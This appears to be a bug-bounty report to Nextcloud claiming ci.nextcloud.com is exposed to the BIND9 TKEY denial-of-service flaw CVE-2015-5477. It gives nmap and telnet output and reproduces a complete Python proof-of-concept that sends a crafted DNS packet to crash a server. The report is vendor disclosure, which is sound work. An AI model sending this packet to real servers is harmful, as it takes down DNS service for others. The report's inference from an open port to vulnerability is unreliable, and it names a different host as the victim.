ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)

Hello Team NextCloud, In reference report #217381 I've reported the DDOS attack via DNS Port at OwnCloud.. And it was successfully patched. But now same issue I got at ``` ci.nextcloud.com ``` Proof Of Concept: Here it is the nmap result of ci.nextcloud.com NMap Scan Results: ``` Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT Nmap scan report for ci.nextcloud.com (█████) Host is up (0.077s latency). rDNS record for █████████: ███████ Not shown: 96 filtered ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 53/tcp open tcpwrapped 80/tcp open tcpwrapped 443/tcp open tcpwrapped ``` Now here it is the telnet result: ``` ──╼ $telnet telnet> open (to) ci.nextcloud.com 53 Trying ███... Connected to ci.nextcloud.com. Escape character is '^]'. ``` So this can leads to a serious DDOS attack at doc.owncloud.com using the exploit.. Exploit Link: ``` https://github.com/elceef/tkeypoc/ ``` Vulnerability Reference CVE Details: ``` https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477 ``` Exploit PoC: Exploit Title: PoC for BIND9 TKEY DoS Exploit Author: elceef Software Link: https://github.com/elceef/tkeypoc/ Version: ISC BIND 9 Tested on: multiple CVE : CVE-2015-5477 ``` !/usr/bin/env python import socket import sys print('CVE-2015-5477 BIND9 TKEY PoC') if len(sys.argv) < 2: print('Usage: ' + sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' + sys.argv[1] + ' ...') payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], 53)) print('Done.') ``` Thanks :)